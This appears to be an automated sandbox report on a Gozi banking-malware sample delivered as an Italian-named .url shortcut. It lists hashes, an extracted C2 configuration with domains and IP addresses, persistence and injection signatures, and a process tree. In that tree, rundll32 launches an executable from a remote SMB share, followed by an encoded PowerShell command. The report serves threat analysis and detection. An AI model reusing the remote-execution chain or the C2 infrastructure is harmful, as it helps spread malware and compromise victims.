Analysis
-
max time kernel
111s -
max time network
126s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
12/01/2023, 11:36
Static task
static1
Behavioral task
behavioral1
Sample
Gennaio_url.url
Resource
win7-20220901-en
General
-
Target
Gennaio_url.url
-
Size
198B
-
MD5
c359626e0daea8955bdbb417316c38ba
-
SHA1
0de679c73d0d580050e252d4aa1924920ff77d3b
-
SHA256
00a11f7f6f468459711a2907e4dc74f7d574b37c7bc5f2b8e73e518848ff9d50
-
SHA512
2ead9ffcb4eb3b878c497c370071cf283e17bb006728219507b250a60e0d6dcd629b30365074d649773086245a8086091e0cd60a60effcd97d88315e3ca66174
Malware Config
Extracted
gozi
Extracted
gozi
7704
checklist.skype.com
62.173.149.202
31.41.44.158
193.0.178.157
-
base_path
/drew/
-
build
250249
-
exe_type
loader
-
extension
.jlk
-
server_id
50
Signatures
-
Executes dropped EXE 2 IoCs
pid Process 452 maintainabovl.exe 2700 maintainabovl.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation maintainabovl.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce Informazion.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" Informazion.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 452 set thread context of 2700 452 maintainabovl.exe 99 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2896 powershell.exe 2896 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 452 maintainabovl.exe Token: SeDebugPrivilege 2896 powershell.exe -
Suspicious use of WriteProcessMemory 19 IoCs
description pid Process procid_target PID 2276 wrote to memory of 3964 2276 rundll32.exe 83 PID 2276 wrote to memory of 3964 2276 rundll32.exe 83 PID 3964 wrote to memory of 452 3964 Informazion.exe 87 PID 3964 wrote to memory of 452 3964 Informazion.exe 87 PID 3964 wrote to memory of 452 3964 Informazion.exe 87 PID 452 wrote to memory of 2896 452 maintainabovl.exe 93 PID 452 wrote to memory of 2896 452 maintainabovl.exe 93 PID 452 wrote to memory of 2896 452 maintainabovl.exe 93 PID 452 wrote to memory of 2700 452 maintainabovl.exe 99 PID 452 wrote to memory of 2700 452 maintainabovl.exe 99 PID 452 wrote to memory of 2700 452 maintainabovl.exe 99 PID 452 wrote to memory of 2700 452 maintainabovl.exe 99 PID 452 wrote to memory of 2700 452 maintainabovl.exe 99 PID 452 wrote to memory of 2700 452 maintainabovl.exe 99 PID 452 wrote to memory of 2700 452 maintainabovl.exe 99 PID 452 wrote to memory of 2700 452 maintainabovl.exe 99 PID 452 wrote to memory of 2700 452 maintainabovl.exe 99 PID 452 wrote to memory of 2700 452 maintainabovl.exe 99 PID 452 wrote to memory of 2700 452 maintainabovl.exe 99
Processes
-
C:\Windows\System32\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\Gennaio_url.url1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2276 -
\??\UNC\62.173.147.16\Agenzia\Informazion.exe"\\62.173.147.16\Agenzia\Informazion.exe"2⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3964 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:452 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMwA4AA==4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2896
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe4⤵
- Executes dropped EXE
PID:2700
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
362.4MB
MD5b405b1565194722f9457002c4edacbae
SHA13a3b6f5a05d8d2e95432abea5241f9fc5178a6fa
SHA256c37fc8e08a4dedac07c4a058b243a6bbab08239fd52b36dbe5de9fb114decc59
SHA512bf7963ab33052ef586b9f3d0b201f34d7ddce4b3d06f697f505b55a6cd2661e92edc76a34113d83c3c61db7ef12856bf5859353d6dd2f6864d8826934e0a1720
-
Filesize
362.4MB
MD5b405b1565194722f9457002c4edacbae
SHA13a3b6f5a05d8d2e95432abea5241f9fc5178a6fa
SHA256c37fc8e08a4dedac07c4a058b243a6bbab08239fd52b36dbe5de9fb114decc59
SHA512bf7963ab33052ef586b9f3d0b201f34d7ddce4b3d06f697f505b55a6cd2661e92edc76a34113d83c3c61db7ef12856bf5859353d6dd2f6864d8826934e0a1720
-
Filesize
362.4MB
MD5b405b1565194722f9457002c4edacbae
SHA13a3b6f5a05d8d2e95432abea5241f9fc5178a6fa
SHA256c37fc8e08a4dedac07c4a058b243a6bbab08239fd52b36dbe5de9fb114decc59
SHA512bf7963ab33052ef586b9f3d0b201f34d7ddce4b3d06f697f505b55a6cd2661e92edc76a34113d83c3c61db7ef12856bf5859353d6dd2f6864d8826934e0a1720